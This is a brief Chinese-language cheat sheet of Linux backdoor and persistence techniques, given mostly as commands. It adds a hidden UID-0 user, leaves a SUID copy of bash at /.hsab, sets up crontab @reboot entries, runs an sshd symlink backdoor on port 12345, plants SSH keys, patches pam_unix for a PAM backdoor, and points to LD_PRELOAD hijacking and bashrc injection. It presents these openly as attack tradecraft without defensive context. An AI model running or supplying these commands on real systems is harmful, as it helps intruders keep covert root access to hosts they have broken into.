1.直接加用户
sudo useradd -ou 0 -g 0 xxx
sudo passwd xxx
echo "password" | passwd --stdin xxx
2.SUID文件
cp /bin/bash /.hsab
chmod u+s /.hsab
ls -al /.hsab
3.Crontab
(crontab -l ; echo "@reboot sleep 200 && echo 123")|crontab 2> /dev/null
4.ssh软连接
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oport=12345
ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsh -oPort=12345
5.ssh key添加
ssh-keygen
追加到 ~/.ssh/authorized_keys
6.PAM后门
源码http://www.linux-pam.org/library/
modules/pam_unix/pam_unix_auth.c
retval = _unix_verify_password(pamh, name, p, ctrl);
//加入后门
...
用新的/modules/pam_unix/.libs/pam_unix.so 替换 /lib64/security/
7.LD_PRELOAD
劫持动态链接库
8.bash_rc , profile等
添加自己的脚本